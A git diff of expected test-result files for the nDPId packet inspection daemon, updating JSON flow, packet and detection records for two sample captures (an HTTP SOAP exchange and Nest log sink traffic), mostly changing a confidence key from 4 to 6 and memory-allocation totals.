00975{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ndpi_match_string_subprotocol__error.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1258162014582,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":422,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":422,"pkt_l4_len":388,"thread_ts_msec":1258162014582,"pkt":"AAAMB6wcAFBWmXinCABFAAGYOjtAAIAGGFUKRIl2CgMJEx+bnriXAiqLAq1VHlAY9oqoWgAASFRUUC8xLsUgMjAwIE9LDQpEYXRlOiBTYXQsIDE0IE5vdiAyMDA5IDAxOjJGOjI3IEdNVA0KU2VydmVyQiBTdW4gR2z6cnNGaXNoIEVudGVycHJpc2UgU2VydmVyIHYyLjENClgtUG93ZXJlZC1CeTogU2VydmxldC8yLjUNCkNvbnRlbnQtVHlw5TogdGV4dC94bWw7Y2hhcnNldD0idXRmLTgiDQpDb250ZW50LUxlbmd0aEwgMTc4DQoNCjw\/eG1sIHZlcnNpb249IjEuMCIgPz48UzpFbnZlbG9wZSB4bWxuczpTPSJodHRwOi8vc2NoZW9hcy54bWxzb2FwLm9yZy9zb2FwL2VudmVsb3BlLyI+PFM6Qm9keT48bnMyOmNvbmZpZ3VyZVJlSnBvbnNlIHhtbG5zOm5zJQAidXJpOi8vYWxjYXRlbC5jb20vYXBjLzIuMCIvPjwvUzpCb2R5PjwvUzpFbnZlbG9wZT4="} 00581{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":8,"source":"ndpi_match_string_subprotocol__error.pcapng","alias":"nDPId-test","packets-captured":8,"packets-processed":7,"total-skipped-flows":0,"total-l4-payload-len":1494,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":8,"global_ts_msec":1258165452647} 
-00955{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":14,"source":"ndpi_match_string_subprotocol__error.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1258162014557,"flow_last_seen":1258165452688,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1126,"flow_tot_l4_payload_len":2701,"flow_avg_l4_payload_len":192,"midstream":0,"thread_ts_msec":1258165452688,"l3_proto":"ip4","src_ip":"10.3.9.19","dst_ip":"10.68.137.118","src_port":40632,"dst_port":8091,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.SOAP","breed":"Acceptable","category":"RPC"}} +00955{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":14,"source":"ndpi_match_string_subprotocol__error.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1258162014557,"flow_last_seen":1258165452688,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1126,"flow_tot_l4_payload_len":2701,"flow_avg_l4_payload_len":192,"midstream":0,"thread_ts_msec":1258165452688,"l3_proto":"ip4","src_ip":"10.3.9.19","dst_ip":"10.68.137.118","src_port":40632,"dst_port":8091,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP.SOAP","breed":"Acceptable","category":"RPC"}} 
00587{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":14,"source":"ndpi_match_string_subprotocol__error.pcapng","alias":"nDPId-test","packets-captured":14,"packets-processed":14,"total-skipped-flows":0,"total-l4-payload-len":2701,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":10,"global_ts_msec":1258165452688} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 14/14 @@ -16,9 +16,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5869965 bytes -~~ total memory freed........: 5869965 bytes -~~ total allocations/frees...: 118132/118132 +~~ total memory allocated....: 6003599 bytes +~~ total memory freed........: 6003599 bytes +~~ total allocations/frees...: 120894/120894 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 494 chars ~~ json string max len.......: 1994 chars diff --git a/test/results/nest_log_sink.pcap.out b/test/results/nest_log_sink.pcap.out index 291faeba7..10b437e99 100644 --- a/test/results/nest_log_sink.pcap.out +++ b/test/results/nest_log_sink.pcap.out 
@@ -10,113 +10,113 @@ 00559{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":101,"source":"nest_log_sink.pcap","alias":"nDPId-test","packets-captured":101,"packets-processed":60,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":10,"global_ts_msec":1536714195599} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":133,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536714602587,"flow_last_seen":1536714602587,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1536714602587,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":133,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1536714602587,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1536714602587,"pkt":"AJD7JidrGLQwJjRACABFAABEL4kAAP8RJr3AqPIPwKjyAc5xADUAMKk+CwgBAAABAAAAAAAADXdlYXZlLWxvZ3NpbmsEbmVzdANjb20AAAEAAQ=="} 
-00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":133,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536714602587,"flow_last_seen":1536714602587,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1536714602587,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weave-logsink.nest.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":133,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536714602587,"flow_last_seen":1536714602587,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1536714602587,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weave-logsink.nest.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00515{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":134,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1536714602587,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1536714602587,"pkt":"GLQwJjRAAJD7JidrCABFAABUsrpAAEARInzAqPIBwKjyDwA1znEAQGW0CwiBgAABAAEAAAAADXdlYXZlLWxvZ3NpbmsEbmVzdANjb20AAAEAAcAMAAEAAQAAAHgABCO8mro="} -00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":134,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1536714602587,"flow_last_seen":1536714602587,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1536714602587,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weave-logsink.nest.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"35.188.154.186"}} +00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":134,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1536714602587,"flow_last_seen":1536714602587,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1536714602587,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"weave-logsink.nest.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"35.188.154.186"}} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":135,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536714602612,"flow_last_seen":1536714602612,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1536714602612,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63342,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":135,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1536714602612,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1536714602612,"pkt":"AJD7JidrGLQwJjRACABFAAAsL4oAAP8GGxPAqPIPI7yauvduK1cIvyQjAAAAAGACEgDGgwAAAgQEgAAA"} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":136,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1536714602681,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1536714602681,"pkt":"GLQwJjRAAJD7JidrCABFAAAsAABAADcG0p0jvJq6wKjyDytX927RT8zNCL8kJGASbvDKWAAAAgQFjA=="} 
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":137,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1536714602684,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1536714602684,"pkt":"AJD7JidrGLQwJjRACABFAAAoL4sAAP8GGxbAqPIPI7yauvduK1cIvyQk0U\/MzlAQEgA+3gAAAAAAAAAA"} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":142,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536714602612,"flow_last_seen":1536714604778,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":679,"flow_tot_l4_payload_len":1262,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1536714604778,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63342,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":142,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536714602612,"flow_last_seen":1536714604778,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":679,"flow_tot_l4_payload_len":1262,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1536714604778,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63342,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} 
00521{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":211,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1536714607328,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":101,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":101,"pkt_l4_len":67,"thread_ts_msec":1536714607328,"pkt":"AJD7JidrGLQwJjRACABFAABXL7IAAP8RJoHAqPIPwKjyAc5xADUAQyQGbMYBAAABAAAAAAAAB2N6ZmUxMDUHZnJvbnQwMQVpYWQwMQpwcm9kdWN0aW9uBG5lc3QDY29tAAABAAE="} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":214,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536714607530,"flow_last_seen":1536714607530,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1536714607530,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63343,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":214,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1536714607530,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1536714607530,"pkt":"AJD7JidrGLQwJjRACABFAAAsL7MAAP8GYsXAqPIPI65S7fdvK1cIymiPAAAAAGACEgDJ5gAAAgQEgAAA"} 
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":215,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1536714607594,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1536714607594,"pkt":"GLQwJjRAAJD7JidrCABFAAAsAABAAC0GJHkjrlLtwKjyDytX92+qr\/jxCMpokGASaQPN\/AAAAgQFtA=="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":216,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1536714607597,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1536714607597,"pkt":"AJD7JidrGLQwJjRACABFAAAoL7QAAP8GYsjAqPIPI65S7fdvK1cIymiQqq\/48lAQEgA8vQAAAAAAAAAA"} -00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":223,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536714607530,"flow_last_seen":1536714609684,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":677,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1536714609684,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63343,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} 
+00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":223,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536714607530,"flow_last_seen":1536714609684,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":677,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1536714609684,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63343,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":237,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536714610253,"flow_last_seen":1536714610253,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1536714610253,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63344,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":237,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1536714610253,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1536714610253,"pkt":"AJD7JidrGLQwJjRACABFAAAsL74AAP8GGt\/AqPIPI7yauvdwK1cI1a0HAAAAAGACEgA9hwAAAgQEgAAA"} 
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":238,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1536714610314,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1536714610314,"pkt":"GLQwJjRAAJD7JidrCABFAAAsAABAADcG0p0jvJq6wKjyDytX93Bcs3xVCNWtCGASbvAGcQAAAgQFjA=="} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":239,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1536714610318,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1536714610318,"pkt":"AJD7JidrGLQwJjRACABFAAAoL78AAP8GGuLAqPIPI7yauvdwK1cI1a0IXLN8VlAQEgB69gAAAAAAAAAA"} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":246,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1536714610253,"flow_last_seen":1536714613730,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":1738,"flow_avg_l4_payload_len":248,"midstream":0,"thread_ts_msec":1536714613730,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63344,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} 
+00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":246,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1536714610253,"flow_last_seen":1536714613730,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":1738,"flow_avg_l4_payload_len":248,"midstream":0,"thread_ts_msec":1536714613730,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63344,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} 00710{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":274,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":83,"flow_first_seen":1536712992228,"flow_last_seen":1536714607385,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":62,"flow_tot_l4_payload_len":62,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1536714735752,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63340,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"2":"Match by IP"},"proto":"NestLogSink.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00699{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":274,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":72,"flow_first_seen":1536714602612,"flow_last_seen":1536714607322,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":679,"flow_tot_l4_payload_len":14831,"flow_avg_l4_payload_len":205,"midstream":0,"thread_ts_msec":1536714735752,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63342,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} -00698{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":274,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1536714610253,"flow_last_seen":1536714615546,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":2786,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1536714735752,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63344,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} +00699{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":274,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":72,"flow_first_seen":1536714602612,"flow_last_seen":1536714607322,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":679,"flow_tot_l4_payload_len":14831,"flow_avg_l4_payload_len":205,"midstream":0,"thread_ts_msec":1536714735752,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63342,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} 
+00698{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":274,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1536714610253,"flow_last_seen":1536714615546,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":2786,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1536714735752,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63344,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} 00564{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":276,"source":"nest_log_sink.pcap","alias":"nDPId-test","packets-captured":276,"packets-processed":215,"total-skipped-flows":0,"total-l4-payload-len":21968,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":5,"total-detection-updates":1,"total-updates":0,"current-active-flows":2,"total-active-flows":5,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":35,"global_ts_msec":1536714800447} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":278,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1536714602587,"flow_last_seen":1536714607527,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":127,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1536714795433,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 
+00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":278,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1536714602587,"flow_last_seen":1536714607527,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":127,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1536714795433,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00564{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":326,"source":"nest_log_sink.pcap","alias":"nDPId-test","packets-captured":326,"packets-processed":245,"total-skipped-flows":0,"total-l4-payload-len":21968,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":5,"total-detection-updates":1,"total-updates":0,"current-active-flows":1,"total-active-flows":5,"total-idle-flows":4,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":37,"global_ts_msec":1536715402175} 